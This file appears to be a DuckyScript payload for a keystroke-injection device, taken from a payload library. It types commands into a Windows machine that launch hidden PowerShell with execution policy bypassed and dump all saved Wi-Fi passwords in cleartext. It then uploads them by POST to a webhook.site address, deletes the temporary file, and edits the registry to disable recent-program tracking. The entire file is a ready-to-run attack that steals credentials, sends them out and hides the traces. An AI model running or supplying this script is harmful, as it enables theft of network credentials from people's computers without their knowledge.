omg-payloads/payloads/library/exfiltration/WiFi_Passwd_Grab/Fast WiFi Exfil (Powershell...

18 lines
683 B
Plaintext

DELAY 1000
GUI r
DELAY 200
STRING powershell -w h -ep bypass "function w{switch -r(netsh wl sh pr){':\s(.+)'{$s=$matches.1;switch -r(netsh wl sh pr n=$s k=clear){'tent.+:\s(.+)'{[PSCustomObject]@{SSID=$s;Pass=$matches.1}}}}}};$w=w;echo $w > $env:tmp\Wi-Fi-PASS"
ENTER
DELAY 100
GUI r
DELAY 200
STRING powershell -w h -ep bypass Invoke-WebRequest -Uri https://webhook.site/<Unique Webhook URL> -Method POST -InFile $env:tmp\Wi-Fi-PASS;Remove-Item $env:tmp\Wi-Fi-PASS -Force -ErrorAction SilentlyContinue
ENTER
DELAY 100
GUI r
DELAY 200
STRING reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackProgs" /t REG_DWORD /d "0" /f
ENTER
DELAY 100
EXIT